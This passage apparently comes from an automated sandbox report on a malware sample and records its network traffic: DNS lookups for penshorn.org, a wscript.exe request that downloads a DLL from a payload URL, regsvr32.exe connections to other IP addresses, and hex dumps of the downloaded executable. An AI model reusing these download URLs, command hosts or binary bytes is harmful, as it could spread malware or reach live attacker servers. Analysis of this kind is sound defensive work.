                                                                                              Mar 17, 2023 09:18:33.139976978 CET44349699159.89.202.34192.168.2.3
                                                                                              Mar 17, 2023 09:18:33.140122890 CET49699443192.168.2.3159.89.202.34
                                                                                              Mar 17, 2023 09:18:33.141849995 CET49699443192.168.2.3159.89.202.34
                                                                                              Mar 17, 2023 09:18:33.141891003 CET44349699159.89.202.34192.168.2.3
                                                                                              Mar 17, 2023 09:18:33.399760962 CET44349699159.89.202.34192.168.2.3
                                                                                              Mar 17, 2023 09:18:33.401052952 CET49700443192.168.2.3159.89.202.34
                                                                                              Mar 17, 2023 09:18:33.401118040 CET44349700159.89.202.34192.168.2.3
                                                                                              Mar 17, 2023 09:18:33.401213884 CET49700443192.168.2.3159.89.202.34
                                                                                              Mar 17, 2023 09:18:33.401853085 CET49700443192.168.2.3159.89.202.34
                                                                                              Mar 17, 2023 09:18:33.401875973 CET44349700159.89.202.34192.168.2.3
                                                                                              Mar 17, 2023 09:18:33.668292999 CET44349700159.89.202.34192.168.2.3

                                                                                              UDP Packets

                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                              Mar 17, 2023 09:16:35.870768070 CET5897453192.168.2.38.8.8.8
                                                                                              Mar 17, 2023 09:16:35.890346050 CET53589748.8.8.8192.168.2.3

                                                                                              DNS Queries

                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                              Mar 17, 2023 09:16:35.870768070 CET192.168.2.38.8.8.80x11baStandard query (0)penshorn.orgA (IP address)IN (0x0001)false

                                                                                              DNS Answers

                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                              Mar 17, 2023 09:16:29.040373087 CET8.8.8.8192.168.2.30x99d2No error (0)windowsupdatebg.s.llnwi.net178.79.242.128A (IP address)IN (0x0001)false
                                                                                              Mar 17, 2023 09:16:29.040373087 CET8.8.8.8192.168.2.30x99d2No error (0)windowsupdatebg.s.llnwi.net95.140.236.128A (IP address)IN (0x0001)false
                                                                                              Mar 17, 2023 09:16:35.890346050 CET8.8.8.8192.168.2.30x11baNo error (0)penshorn.org203.26.41.131A (IP address)IN (0x0001)false
                                                                                              Mar 17, 2023 09:17:19.883671045 CET8.8.8.8192.168.2.30xb6f0No error (0)windowsupdatebg.s.llnwi.net95.140.230.192A (IP address)IN (0x0001)false

                                                                                              HTTP Request Dependency Graph

                                                                                              • penshorn.org
                                                                                              • 182.162.143.56

                                                                                              HTTP Packets

                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              0192.168.2.349683203.26.41.131443C:\Windows\SysWOW64\wscript.exe
                                                                                              TimestampkBytes transferredDirectionData


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              1192.168.2.349687182.162.143.56443C:\Windows\System32\regsvr32.exe
                                                                                              TimestampkBytes transferredDirectionData


                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              2192.168.2.349688187.63.160.8880C:\Windows\System32\regsvr32.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              Mar 17, 2023 09:17:40.400696039 CET527OUTData Raw: 16 03 03 00 97 01 00 00 93 03 03 64 14 92 a3 7c 81 97 32 54 2e a1 30 fe 69 bb 61 75 6e 2d 66 38 d1 fb 0f 9d aa 53 34 3b 8a 6a 9d 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                              Data Ascii: d|2T.0iaun-f8S4;j*,+0/$#('=<5/@#
                                                                                              Mar 17, 2023 09:17:40.643374920 CET528INData Raw: 16 03 03 00 41 02 00 00 3d 03 03 ed bc 56 50 0c 18 6f c3 15 e7 b5 d1 55 2c 4e 6c 9c 5a a7 23 b0 0d 3e f9 5a 41 5a 6e ee be f7 e0 00 c0 30 00 00 15 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 23 00 00 00 17 00 00 16 03 03 03 cf 0b 00 03 cb 00 03 c8
                                                                                              Data Ascii: A=VPoU,NlZ#>ZAZn0#00* aH0*H0w10UGB10ULondon10ULondon10UGlobal Security10UIT Department10Uexample.c
                                                                                              Mar 17, 2023 09:17:40.643405914 CET529INData Raw: d9 c2 28 c2 20 da 78 ef 47 61 47 9b fb 22 36 ca d8 5f 8e a3 be 43 d7 7c cf 12 c6 60 48 b5 74 02 d7 e4 c8 c1 a9 0c 14 d8 1e 3e 15 03 b7 d4 8a 84 0f 1c 92 39 11 96 74 51 7e d7 41 c6 d7 cd ce f4 4d 33 0d f9 06 16 03 03 00 04 0e 00 00 00
                                                                                              Data Ascii: ( xGaG"6_C|`Ht>9tQ~AM3
                                                                                              Mar 17, 2023 09:17:40.647331953 CET529OUTData Raw: 16 03 03 00 25 10 00 00 21 20 96 92 29 51 6e be d8 5b 6d 6b 2c cb 56 1b 86 08 8b 7f 3a 90 f7 6e 53 f2 fb 78 63 3b 5c b5 3d 2f 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 b9 38 7a 70 d8 7d 3e a5 92 4f 95 1c 74 6d cf 00 39 5e 68 4c de
                                                                                              Data Ascii: %! )Qn[mk,V:nSxc;\=/(8zp}>Otm9^hL'Mo1hC
                                                                                              Mar 17, 2023 09:17:40.875297070 CET529INData Raw: 16 03 03 00 ba 04 00 00 b6 00 00 01 2c 00 b0 41 31 a7 4e 61 dc 74 8b 8a 90 c0 42 d1 49 f2 c2 96 5e 30 3f 6a 28 cd a4 84 8b 33 3c f0 a4 91 7a 29 3e 1b 65 b1 fc b9 20 d0 03 38 cc 4b 39 11 7b 13 be c3 4a b0 1f 0a fa a4 d5 d1 dd f0 9f 50 18 61 ca ba
                                                                                              Data Ascii: ,A1NatBI^0?j(3<z)>e 8K9{JPaVS.Yfb673'Q4B}znVKa3M2m<M6JNcA%7(CLLlJe;d##?
                                                                                              Mar 17, 2023 09:17:40.884608984 CET529OUTData Raw: 17 03 03 00 9b 00 00 00 00 00 00 00 01 9b 5b 6b 28 9b 22 33 8d 1a c3 5f 8e 38 2c fd 9a b3 88 c7 c1 3c 18 f6 f4 6d 14 11 ea 7a 25 eb f7 e8 1a 20 03 3d 34 21 7c e5 e3 0d 18 9b af b7 d1 8a b3 e0 0e 64 97 99 56 08 b5 e1 63 33 ca 38 24 0f f7 53 92 0c
                                                                                              Data Ascii: [k("3_8,<mz% =4!|dVc38$S+@3yBXt^~Mj77Thr_unQavxj]*:
                                                                                              Mar 17, 2023 09:17:42.176580906 CET530INData Raw: 17 03 03 01 3e 88 43 9e e1 ea 11 bf cb 64 00 d4 a2 a4 a1 84 bb 42 59 73 41 c4 7f 06 99 c8 c5 59 f4 c4 ff 13 0d db d3 f3 2e 96 c6 5a 50 92 19 de 7c 95 af 38 c9 ec 55 2f 77 13 90 68 22 c1 0f 20 d9 04 47 9e a4 2f 9e 78 82 60 eb 36 c5 4c f0 b7 6b 3d
                                                                                              Data Ascii: >CdBYsAY.ZP|8U/wh" G/x`6Lk=E8'7X;PRWJ[6M{$:4m;K~Q}u|`r\h{:MEy]h( %l<+7nJe~a`ducY4
                                                                                              Mar 17, 2023 09:17:45.176423073 CET530INData Raw: 15 03 03 00 1a 88 43 9e e1 ea 11 bf cc 7d 08 62 a0 53 ce f6 2d 9e 06 d2 6c 33 33 df a3 f4 a5
                                                                                              Data Ascii: C}bS-l33
                                                                                              Mar 17, 2023 09:17:45.493266106 CET530OUTData Raw: 15 03 03 00 1a 00 00 00 00 00 00 00 02 a3 6e b6 df 6b 26 3f 63 73 c1 e7 9b 0d 12 be ad 4c a8
                                                                                              Data Ascii: nk&?csL


                                                                                              HTTPS Proxied Packets

                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              0192.168.2.349683203.26.41.131443C:\Windows\SysWOW64\wscript.exe
                                                                                              TimestampkBytes transferredDirectionData
                                                                                              2023-03-17 08:16:36 UTC0OUTGET /admin/Ses8712iGR8du/ HTTP/1.1
                                                                                              Connection: Keep-Alive
                                                                                              Accept: */*
                                                                                              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
                                                                                              Host: penshorn.org
                                                                                              2023-03-17 08:16:37 UTC0INHTTP/1.1 200 OK
                                                                                              Date: Fri, 17 Mar 2023 08:16:36 GMT
                                                                                              Server: Apache
                                                                                              X-Powered-By: PHP/7.0.33
                                                                                              Cache-Control: no-cache, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Fri, 17 Mar 2023 08:16:36 GMT
                                                                                              Content-Disposition: attachment; filename="QStvR8Jwnikk52.dll"
                                                                                              Content-Transfer-Encoding: binary
                                                                                              Set-Cookie: 641421e4f209f=1679040996; expires=Fri, 17-Mar-2023 08:17:36 GMT; Max-Age=60; path=/
                                                                                              Last-Modified: Fri, 17 Mar 2023 08:16:36 GMT
                                                                                              Connection: close
                                                                                              Transfer-Encoding: chunked
                                                                                              Content-Type: application/x-msdownload
                                                                                              2023-03-17 08:16:37 UTC0INData Raw: 34 30 30 30 0d 0a 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4c 60 e2 3d 08 01 8c 6e 08 01 8c 6e 08 01 8c 6e 43 79 8f 6f 03 01 8c 6e 43 79 89 6f 8e 01 8c 6e 43 79 88 6f 04 01 8c 6e 88 7a 89 6f 28 01 8c 6e 88 7a 88 6f 06 01 8c 6e 88 7a 8f 6f 01 01 8c 6e 43 79 8d 6f 01 01 8c 6e 08 01 8d 6e 71 01 8c 6e 87 7a 85 6f 0c 01 8c 6e 87 7a 8c 6f 09 01 8c 6e 87 7a 73 6e 09 01 8c 6e 08 01 1b 6e 09 01 8c 6e 87 7a 8e 6f 09 01 8c 6e 52
                                                                                              Data Ascii: 4000MZ@!L!This program cannot be run in DOS mode.$L`=nnnCyonCyonCyonzo(nzonzonCyonnqnzonzonzsnnnnzonR
                                                                                              2023-03-17 08:16:37 UTC8INData Raw: 44 09 c0 f3 42 0f 7f 44 09 d0 f3 42 0f 7f 44 09 e0 f3 42 0f 7f 44 01 f0 f3 0f 7f 00 c3 48 83 ec 28 e8 ab 1a 00 00 84 c0 75 04 32 c0 eb 12 e8 fe 03 00 00 84 c0 75 07 e8 dd 1a 00 00 eb ec b0 01 48 83 c4 28 c3 48 83 ec 28 e8 23 03 00 00 48 85 c0 0f 95 c0 48 83 c4 28 c3 48 83 ec 28 33 c9 e8 a1 02 00 00 b0 01 48 83 c4 28 c3 cc cc 48 83 ec 28 84 c9 75 0a e8 ff 03 00 00 e8 9a 1a 00 00 b0 01 48 83 c4 28 c3 cc cc cc 48 83 ec 28 e8 e7 03 00 00 b0 01 48 83 c4 28 c3 48 89 5c 24 08 48 89 6c 24 10 48 89 74 24 18 57 41 54 41 55 41 56 41 57 48 83 ec 40 48 8b e9 4d 8b f9 49 8b c8 49 8b f0 4c 8b ea e8 d0 1a 00 00 4d 8b 67 08 4d 8b 37 49 8b 5f 38 4d 2b f4 f6 45 04 66 41 8b 7f 48 0f 85 dc 00 00 00 48 89 6c 24 30 48 89 74 24 38 3b 3b 0f 83 76 01 00 00 8b f7 48 03 f6 8b 44 f3
                                                                                              Data Ascii: DBDBDBDH(u2uH(H(#HH(H(3H(H(uH(H(H(H\$Hl$Ht$WATAUAVAWH@HMIILMgM7I_8M+EfAHHl$0Ht$8;;vHD
                                                                                              2023-03-17 08:16:37 UTC16INData Raw: 0d 0a
                                                                                              Data Ascii:
                                                                                              2023-03-17 08:16:37 UTC16INData Raw: 34 30 30 30 0d 0a 66 89 48 08 c3 4c 8b 02 0f b6 4a 08 4c 89 00 88 48 08 c3 4c 8b 02 8b 4a 08 4c 89 00 89 48 08 c3 8b 0a 44 0f b7 42 04 89 08 66 44 89 40 04 c3 8b 0a 44 0f b6 42 04 89 08 44 88 40 04 c3 48 8b 0a 48 89 08 c3 0f b6 0a 88 08 c3 8b 0a 89 08 c3 90 49 83 f8 20 77 17 f3 0f 6f 0a f3 42 0f 6f 54 02 f0 f3 0f 7f 09 f3 42 0f 7f 54 01 f0 c3 48 3b d1 73 0e 4e 8d 0c 02 49 3b c9 0f 82 41 04 00 00 90 83 3d 91 c3 01 00 03 0f 82 e3 02 00 00 49 81 f8 00 20 00 00 76 16 49 81 f8 00 00 18 00 77 0d f6 05 ea d3 01 00 02 0f 85 64 fe ff ff c5 fe 6f 02 c4 a1 7e 6f 6c 02 e0 49 81 f8 00 01 00 00 0f 86 c4 00 00 00 4c 8b c9 49 83 e1 1f 49 83 e9 20 49 2b c9 49 2b d1 4d 03 c1 49 81 f8 00 01 00 00 0f 86 a3 00 00 00 49 81 f8 00 00 18 00 0f 87 3e 01 00 00 66 66 66 66 66 66 0f
                                                                                              Data Ascii: 4000fHLJLHLJLHDBfD@DBD@HHI woBoTBTH;sNI;A=I vIwdo~olILII I+I+MII>ffffff
                                                                                              2023-03-17 08:16:37 UTC24INData Raw: 48 83 ec 20 48 8b 1d 0b a4 01 00 48 8b cb e8 3b 18 00 00 48 8b cb e8 db 3f 00 00 48 8b cb e8 cb 40 00 00 48 8b cb e8 7f 43 00 00 48 8b cb e8 4b f5 ff ff b0 01 48 83 c4 20 5b c3 cc cc cc 33 c9 e9 19 be ff ff cc 40 53 48 83 ec 20 48 8b 0d b3 b9 01 00 83 c8 ff f0 0f c1 01 83 f8 01 75 1f 48 8b 0d a0 b9 01 00 48 8d 1d f9 a3 01 00 48 3b cb 74 0c e8 1b 1b 00 00 48 89 1d 88 b9 01 00 b0 01 48 83 c4 20 5b c3 48 83 ec 28 48 8b 0d b5 bf 01 00 e8 fc 1a 00 00 48 8b 0d b1 bf 01 00 48 83 25 a1 bf 01 00 00 e8 e8 1a 00 00 48 8b 0d 75 b9 01 00 48 83 25 95 bf 01 00 00 e8 d4 1a 00 00 48 8b 0d 69 b9 01 00 48 83 25 59 b9 01 00 00 e8 c0 1a 00 00 48 83 25 54 b9 01 00 00 b0 01 48 83 c4 28 c3 cc 48 8d 15 fd 0b 01 00 48 8d 0d f6 0a 01 00 e9 25 3e 00 00 cc 48 83 ec 28 e8 37 12 00 00
                                                                                              Data Ascii: H HH;H?H@HCHKH [3@SH HuHHH;tHH [H(HHH%HuH%HiH%YH%TH(HH%>H(7
                                                                                              2023-03-17 08:16:37 UTC32INData Raw: 0d 0a
                                                                                              Data Ascii:
                                                                                              2023-03-17 08:16:37 UTC32INData Raw: 34 30 30 30 0d 0a 4c 8b 00 49 8b cc 48 ff c1 45 38 3c 08 75 f7 48 ff c2 48 83 c0 08 48 03 d1 48 3b c6 75 e2 48 89 55 50 41 b8 01 00 00 00 49 8b ce e8 3c d7 ff ff 48 8b d8 48 85 c0 75 32 33 c9 e8 4d fb ff ff 48 8b df 48 3b fe 74 11 48 8b 0b e8 3d fb ff ff 48 83 c3 08 48 3b de 75 ef 41 8b f4 48 8b cf e8 29 fb ff ff 8b c6 e9 8d 00 00 00 4a 8d 0c f0 4c 8b f7 48 89 4d 58 4c 8b e1 48 3b fe 74 4c 48 2b c7 48 89 45 48 4d 8b 06 49 83 cf ff 49 ff c7 43 80 3c 38 00 75 f6 48 8b d1 49 ff c7 49 2b d4 4d 8b cf 48 03 55 50 49 8b cc e8 03 38 00 00 85 c0 75 5e 48 8b 45 48 48 8b 4d 58 4e 89 24 30 4d 03 e7 49 83 c6 08 4c 3b f6 75 bb 33 c9 49 89 5d 00 e8 b8 fa ff ff 48 8b df 48 3b fe 74 11 48 8b 0b e8 a8 fa ff ff 48 83 c3 08 48 3b de 75 ef 48 8b cf e8 97 fa ff ff 33 c0 48 8b
                                                                                              Data Ascii: 4000LIHE8<uHHHH;uHUPAI<HHu23MHH;tH=HH;uAH)JLHMXLH;tLH+HEHMIIC<8uHII+MHUPI8u^HEHHMXN$0MIL;u3I]HH;tHHH;uH3H
                                                                                              2023-03-17 08:16:37 UTC40INData Raw: 5c 24 08 57 48 83 ec 20 48 8b f9 e8 2e 00 00 00 33 db 48 85 c0 74 1a 49 ba 70 20 d3 1c df 0f ed d1 48 8b cf ff 15 54 b7 00 00 85 c0 0f 95 c3 8b c3 48 8b 5c 24 30 48 83 c4 20 5f c3 cc cc 40 53 48 83 ec 20 33 c9 e8 1b d5 ff ff 90 48 8b 05 c3 63 01 00 8b c8 83 e1 3f 48 8b 1d 9f 7f 01 00 48 33 d8 48 d3 cb 33 c9 e8 4e d5 ff ff 48 8b c3 48 83 c4 20 5b c3 cc 48 89 5c 24 08 4c 89 4c 24 20 57 48 83 ec 20 49 8b f9 8b 0a e8 d7 d4 ff ff 90 48 8b 05 7f 63 01 00 8b c8 83 e1 3f 48 8b 1d 73 7f 01 00 48 33 d8 48 d3 cb 8b 0f e8 0a d5 ff ff 48 8b c3 48 8b 5c 24 30 48 83 c4 20 5f c3 4c 8b dc 48 83 ec 28 b8 03 00 00 00 4d 8d 4b 10 4d 8d 43 08 89 44 24 38 49 8d 53 18 89 44 24 40 49 8d 4b 08 e8 8f ff ff ff 48 83 c4 28 c3 cc cc 48 89 0d 11 7f 01 00 48 89 0d 12 7f 01 00 48 89 0d
                                                                                              Data Ascii: \$WH H.3HtIp HTH\$0H _@SH 3Hc?HH3H3NHH [H\$LL$ WH IHc?HsH3HHH\$0H _LH(MKMCD$8ISD$@IKH(HHH
                                                                                              2023-03-17 08:16:37 UTC48INData Raw: 0d 0a
                                                                                              Data Ascii:
                                                                                              2023-03-17 08:16:37 UTC48INData Raw: 34 30 30 30 0d 0a 48 8b 45 08 83 a0 a8 03 00 00 fd 8b c7 48 8b 4d 28 48 33 cd e8 97 44 ff ff 48 8b 5d 60 48 8b 75 68 48 8b 7d 70 48 8d 65 30 41 5f 41 5e 41 5d 41 5c 5d c3 cc 40 55 41 54 41 55 41 56 41 57 48 83 ec 60 48 8d 6c 24 50 48 89 5d 40 48 89 75 48 48 89 7d 50 48 8b 05 b6 43 01 00 48 33 c5 48 89 45 08 48 63 7d 60 49 8b f1 45 8b e0 4c 8b ea 48 8b d9 85 ff 7e 14 48 8b d7 49 8b c9 e8 c0 1b 00 00 3b c7 8d 78 01 7c 02 8b f8 44 8b 75 78 45 85 f6 75 07 48 8b 03 44 8b 70 0c f7 9d 80 00 00 00 44 8b cf 4c 8b c6 41 8b ce 1b d2 83 64 24 28 00 48 83 64 24 20 00 83 e2 08 ff c2 e8 05 d4 ff ff 33 d2 4c 63 f8 85 c0 0f 84 73 02 00 00 49 8b c7 48 03 c0 48 8d 48 10 48 3b c1 48 1b c0 48 23 c1 0f 84 3d 02 00 00 49 b8 f0 ff ff ff ff ff ff 0f 48 3d 00 04 00 00 77 31 48 8d
                                                                                              Data Ascii: 4000HEHM(H3DH]`HuhH}pHe0A_A^A]A\]@UATAUAVAWH`Hl$PH]@HuHH}PHCH3HEHc}`IELH~HI;x|DuxEuHDpDLAd$(Hd$ 3LcsIHHHH;HH#=IH=w1H
                                                                                              2023-03-17 08:16:37 UTC56INData Raw: e1 49 03 c1 66 48 0f 6e c8 66 0f 2f 25 75 da 00 00 0f 82 df 00 00 00 48 c1 e8 2c 66 0f eb 15 c3 d9 00 00 66 0f eb 0d bb d9 00 00 4c 8d 0d 34 eb 00 00 f2 0f 5c ca f2 41 0f 59 0c c1 66 0f 28 d1 66 0f 28 c1 4c 8d 0d fb da 00 00 f2 0f 10 1d 03 da 00 00 f2 0f 10 0d cb d9 00 00 f2 0f 59 da f2 0f 59 ca f2 0f 59 c2 66 0f 28 e0 f2 0f 58 1d d3 d9 00 00 f2 0f 58 0d 9b d9 00 00 f2 0f 59 e0 f2 0f 59 da f2 0f 59 c8 f2 0f 58 1d a7 d9 00 00 f2 0f 58 ca f2 0f 59 dc f2 0f 58 cb f2 0f 10 2d 13 d9 00 00 f2 0f 59 0d cb d8 00 00 f2 0f 59 ee f2 0f 5c e9 f2 41 0f 10 04 c1 48 8d 15 96 e2 00 00 f2 0f 10 14 c2 f2 0f 10 25 d9 d8 00 00 f2 0f 59 e6 f2 0f 58 c4 f2 0f 58 d5 f2 0f 58 c2 66 0f 6f 74 24 20 48 83 c4 58 c3 66 66 66 66 66 66 0f 1f 84 00 00 00 00 00 f2 0f 10 15 c8 d8 00 00 f2
                                                                                              Data Ascii: IfHnf/%uH,ffL4\AYf(f(LYYYf(XXYYYXXYX-YY\AH%YXXXfot$ HXffffff
                                                                                              2023-03-17 08:16:37 UTC64INData Raw: 0d 0a
                                                                                              Data Ascii:
                                                                                              2023-03-17 08:16:37 UTC64INData Raw: 34 30 30 30 0d 0a cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 48 89 54 24 10 89 4c 24 08 48 81 ec 58 03 00 00 48 8b 05 e9 03 01 00 48 33 c4 48 89 84 24 40 03 00 00 48 c7 44 24 48 00 00 00 00 48 8d 05 46 d3 00 00 48 89 44 24 60 48 c7 44 24 68 00 00 00 00 48 c7 44 24 70 00 00 00 00 48 c7 44 24 50 00 00 00 00 48 c7 44 24 40 00 00 00 00 b8 08 00 00 00 48 6b c0 00 48 8d 0d 35 d3 00 00 48 89 8c 04 80 00 00 00 48 63 84 24 60 03 00 00 b9 08 00 00 00 48 6b c9 01 48 89 84 0c 80 00 00 00 b8 08 00 00 00 48 6b c0 02 48 c7 84 04 80 00 00 00 09 04 00 00 4c 8d 4c 24 58 41 b8 03 00 00 00 48 8d 94 24 80 00 00 00 48 8d 0d 35 f3 fe ff ff 15 4f 56 00 00 89 44 24 34 4c 8d 4c 24 40 4c 8d 44 24 50 48 8b 54 24 58 48 8d 0d 15 f3 fe ff ff 15 47 56 00 00 89 44 24 34 c7 44 24 28
                                                                                              Data Ascii: 4000HT$L$HXHH3H$@HD$HHFHD$`HD$hHD$pHD$PHD$@HkH5HHc$`HkHHkHLL$XAH$H5OVD$4LL$@LD$PHT$XHGVD$4D$(
                                                                                              2023-03-17 08:16:37 UTC72INData Raw: c0 75 06 ff 15 b5 34 00 00 33 d2 33 c9 ff 15 d3 36 00 00 85 c0 75 06 ff 15 a1 34 00 00 33 d2 33 c9 ff 15 bf 36 00 00 85 c0 75 06 ff 15 8d 34 00 00 33 d2 33 c9 ff 15 ab 36 00 00 85 c0 75 06 ff 15 79 34 00 00 33 d2 33 c9 ff 15 97 36 00 00 85 c0 75 06 ff 15 65 34 00 00 33 d2 33 c9 ff 15 83 36 00 00 85 c0 75 06 ff 15 51 34 00 00 33 d2 33 c9 ff 15 6f 36 00 00 85 c0 75 06 ff 15 3d 34 00 00 33 d2 33 c9 ff 15 5b 36 00 00 85 c0 75 06 ff 15 29 34 00 00 33 d2 33 c9 ff 15 47 36 00 00 85 c0 75 06 ff 15 15 34 00 00 33 d2 33 c9 ff 15 33 36 00 00 85 c0 75 06 ff 15 01 34 00 00 33 d2 33 c9 ff 15 1f 36 00 00 85 c0 75 06 ff 15 ed 33 00 00 33 d2 33 c9 ff 15 0b 36 00 00 85 c0 75 06 ff 15 d9 33 00 00 33 d2 33 c9 ff 15 f7 35 00 00 85 c0 75 06 ff 15 c5 33 00 00 33 d2 33 c9 ff 15
                                                                                              Data Ascii: u4336u4336u4336uy4336ue4336uQ433o6u=433[6u)433G6u43336u4336u3336u3335u333
                                                                                              2023-03-17 08:16:37 UTC80INData Raw: 0d 0a
                                                                                              Data Ascii:
                                                                                              2023-03-17 08:16:38 UTC80INData Raw: 34 30 30 30 0d 0a 48 8b 44 24 20 0f be 00 85 c0 74 58 8b 04 24 c1 e8 0d 8b 0c 24 c1 e1 13 0b c1 89 04 24 48 8b 44 24 20 0f be 00 83 f8 61 7c 11 48 8b 44 24 20 0f be 00 83 e8 20 89 44 24 04 eb 0c 48 8b 44 24 20 0f be 00 89 44 24 04 8b 44 24 04 8b 0c 24 03 c8 8b c1 89 04 24 48 8b 44 24 20 48 ff c0 48 89 44 24 20 eb 9c 8b 05 0e e1 00 00 8b 0c 24 03 c8 8b c1 89 04 24 8b 04 24 48 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 44 89 4c 24 20 4c 89 44 24 18 48 89 54 24 10 48 89 4c 24 08 48 83 ec 58 41 b9 64 00 00 00 4c 8d 05 cb e0 00 00 ba 67 00 00 00 48 8b 4c 24 60 ff 15 13 16 00 00 41 b9 64 00 00 00 4c 8d 05 de df 00 00 ba 6d 00 00 00 48 8b 4c 24 60 ff 15 f6 15 00 00 48 8b 4c 24 60 e8 e4 bc ff ff 8b 54 24 78 48 8b 4c 24 60 e8 16 bc ff
                                                                                              Data Ascii: 4000HD$ tX$$$HD$ a|HD$ D$HD$ D$D$$$HD$ HHD$ $$$HDL$ LD$HT$HL$HXAdLgHL$`AdLmHL$`HL$`T$xHL$`
                                                                                              2023-03-17 08:16:38 UTC88INData Raw: 00 00 00 00 40 3e 00 00 00 00 00 00 20 3f 18 2d 44 54 fb 21 e9 3f 00 00 00 00 80 84 1e 41 00 00 00 00 d0 12 73 41 ff ff ff ff ff ff ff 7f 00 00 00 00 00 00 f0 7f 00 00 00 00 00 00 f0 41 00 00 00 00 00 00 f0 bf 05 00 00 c0 0b 00 00 00 00 00 00 00 00 00 00 00 1d 00 00 c0 04 00 00 00 00 00 00 00 00 00 00 00 96 00 00 c0 04 00 00 00 00 00 00 00 00 00 00 00 8d 00 00 c0 08 00 00 00 00 00 00 00 00 00 00 00 8e 00 00 c0 08 00 00 00 00 00 00 00 00 00 00 00 8f 00 00 c0 08 00 00 00 00 00 00 00 00 00 00 00 90 00 00 c0 08 00 00 00 00 00 00 00 00 00 00 00 91 00 00 c0 08 00 00 00 00 00 00 00 00 00 00 00 92 00 00 c0 08 00 00 00 00 00 00 00 00 00 00 00 93 00 00 c0 08 00 00 00 00 00 00 00 00 00 00 00 b4 02 00 c0 08 00 00 00 00 00 00 00 00 00 00 00 b5 02 00 c0 08 00 00 00 00
                                                                                              Data Ascii: @> ?-DT!?AsAA
                                                                                              2023-03-17 08:16:38 UTC96INData Raw: 0d 0a
                                                                                              Data Ascii:
                                                                                              2023-03-17 08:16:38 UTC96INData Raw: 34 30 30 30 0d 0a 03 04 00 00 00 00 00 00 30 a2 01 80 01 00 00 00 04 04 00 00 00 00 00 00 88 7e 01 80 01 00 00 00 05 04 00 00 00 00 00 00 40 a2 01 80 01 00 00 00 06 04 00 00 00 00 00 00 50 a2 01 80 01 00 00 00 07 04 00 00 00 00 00 00 60 a2 01 80 01 00 00 00 08 04 00 00 00 00 00 00 70 a2 01 80 01 00 00 00 09 04 00 00 00 00 00 00 f0 8a 01 80 01 00 00 00 0b 04 00 00 00 00 00 00 80 a2 01 80 01 00 00 00 0c 04 00 00 00 00 00 00 90 a2 01 80 01 00 00 00 0d 04 00 00 00 00 00 00 a0 a2 01 80 01 00 00 00 0e 04 00 00 00 00 00 00 b0 a2 01 80 01 00 00 00 0f 04 00 00 00 00 00 00 c0 a2 01 80 01 00 00 00 10 04 00 00 00 00 00 00 d0 a2 01 80 01 00 00 00 11 04 00 00 00 00 00 00 58 7e 01 80 01 00 00 00 12 04 00 00 00 00 00 00 78 7e 01 80 01 00 00 00 13 04 00 00 00 00 00 00 e0
                                                                                              Data Ascii: 40000~@P`pX~x~
                                                                                              2023-03-17 08:16:38 UTC104INData Raw: 00 00 00 00 00 00 68 c1 01 80 01 00 00 00 56 00 00 00 00 00 00 00 a0 a0 01 80 01 00 00 00 15 00 00 00 00 00 00 00 78 c1 01 80 01 00 00 00 57 00 00 00 00 00 00 00 88 c1 01 80 01 00 00 00 98 00 00 00 00 00 00 00 98 c1 01 80 01 00 00 00 8c 00 00 00 00 00 00 00 a8 c1 01 80 01 00 00 00 9f 00 00 00 00 00 00 00 b8 c1 01 80 01 00 00 00 a8 00 00 00 00 00 00 00 a8 a0 01 80 01 00 00 00 16 00 00 00 00 00 00 00 c8 c1 01 80 01 00 00 00 58 00 00 00 00 00 00 00 b0 a0 01 80 01 00 00 00 17 00 00 00 00 00 00 00 d8 c1 01 80 01 00 00 00 59 00 00 00 00 00 00 00 d8 a1 01 80 01 00 00 00 3c 00 00 00 00 00 00 00 e8 c1 01 80 01 00 00 00 85 00 00 00 00 00 00 00 f8 c1 01 80 01 00 00 00 a7 00 00 00 00 00 00 00 08 c2 01 80 01 00 00 00 76 00 00 00 00 00 00 00 18 c2 01 80 01 00 00 00 9c
                                                                                              Data Ascii: hVxWXY<v
                                                                                              2023-03-17 08:16:38 UTC112INData Raw: 0d 0a
                                                                                              Data Ascii:
